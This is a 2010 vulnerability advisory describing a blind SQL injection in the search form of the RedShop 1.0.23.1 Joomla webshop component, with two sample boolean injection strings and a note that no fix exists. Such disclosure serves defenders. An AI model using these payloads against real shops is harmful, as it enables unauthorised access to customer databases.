72 lines
No EOL
1.5 KiB
Text
72 lines
No EOL
1.5 KiB
Text
RedShop 1.0.23.1 Joomla Component Blind SQL Injection Vulnerability
|
|
|
|
Name RedShop
|
|
Vendor http://redweb.dk
|
|
Versions Affected 1.0.23.1
|
|
|
|
Author Salvatore Fresta aka Drosophila
|
|
Website http://www.salvatorefresta.net
|
|
Contact salvatorefresta [at] gmail [dot] com
|
|
Date 2010-07-13
|
|
|
|
X. INDEX
|
|
|
|
I. ABOUT THE APPLICATION
|
|
II. DESCRIPTION
|
|
III. ANALYSIS
|
|
IV. SAMPLE CODE
|
|
V. FIX
|
|
|
|
|
|
I. ABOUT THE APPLICATION
|
|
________________________
|
|
|
|
RedShop is a popular and commercial Joomla component.
|
|
It is a Content Creation Kit style of webshop / webshop
|
|
tool where you got the most access ever given to any user
|
|
to completely style around and change thier webshop,
|
|
without alot more knowledge then HTML and a bit of CSS.
|
|
|
|
|
|
II. DESCRIPTION
|
|
_______________
|
|
|
|
A parameter in the search form is not properly sanitised
|
|
before being used in a SQL query.
|
|
|
|
|
|
III. ANALYSIS
|
|
_____________
|
|
|
|
Summary:
|
|
|
|
A) Blind SQL Injection
|
|
|
|
|
|
A) Blind SQL Injection
|
|
______________________
|
|
|
|
The parameters viewform and id are not properly sanitised
|
|
The parameter keyword is not properly sanitised before
|
|
being used in a SQL query. This can be exploited to
|
|
manipulate SQL queries by injecting arbitrary SQL code.
|
|
|
|
Successful exploitation requires that "magic_quotes_gpc"
|
|
is disabled.
|
|
|
|
|
|
IV. SAMPLE CODE
|
|
_______________
|
|
|
|
A) Blind SQL Injection
|
|
|
|
Copy and past the following lines in the search form:
|
|
|
|
' AND (SELECT(IF(ASCII(0x41) = 64,false,NULL))) OR '
|
|
' AND (SELECT(IF(ASCII(0x41) = 65,true,NULL))) OR '
|
|
|
|
|
|
V. FIX
|
|
______
|
|
|
|
No fix. |